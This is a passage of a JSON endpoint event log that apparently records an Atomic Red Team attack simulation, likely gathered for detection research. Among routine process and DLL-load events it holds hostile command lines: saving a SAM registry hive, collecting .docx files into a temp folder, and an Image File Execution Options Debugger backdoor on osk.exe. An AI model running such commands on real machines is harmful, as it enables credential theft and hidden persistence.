"C:\\Windows\\System32\\KernelBase.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "file", - "file_name": "REGD250.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGD250.tmp", - "pid": 2160, - "process_name": "reg.exe", - "process_path": 
"C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "file", - "file_name": "REGD250.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGD250.tmp", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "file", - "file_name": "sam.hive", - "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\sam.hive", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "process", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "process", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - 
"logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1232, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571820020016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - 
"timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "process", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6036, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571821140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "image_load", - "image_name": 
"KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7980, - "ppid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571821220000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "command_line": "findstr /e .docx", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1572, - "ppid": 6036, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "subtype": "create", - "timestamp": 131883571821260000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "image_load", - "image_name": "findstr.exe", - "image_path": "C:\\Windows\\System32\\findstr.exe", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - 
"image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": 
"C:\\Windows\\System32\\gdi32full.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "process", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571821830000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "process", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "subtype": "terminate", - "timestamp": 131883571821830000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "process", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571821830000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "file", - 
"file_name": "FINDSTR.EXE-4176B665.pf", - "file_path": "C:\\Windows\\Prefetch\\FINDSTR.EXE-4176B665.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571821830000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /R c: %%f in (*.docx) do copy %%f c:\\temp\\\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2012, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571822010000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": 
"C:\\Windows\\System32\\KernelBase.dll", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "process", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571822140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3088, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571822270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822140000, - "unique_pid": 
"{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "process", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571822300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\osk.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4816, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571824540000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": 
"ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\osk.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4564, - "ppid": 4816, - "process_name": "reg.exe", - 
"process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571824630000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-001062235101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 
4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "registry", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe", - "registry_value": "osk.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "registry", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger", - "registry_value": "Debugger", - 
"timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "process", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "process", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6884, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571824790000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}", - "unique_ppid": 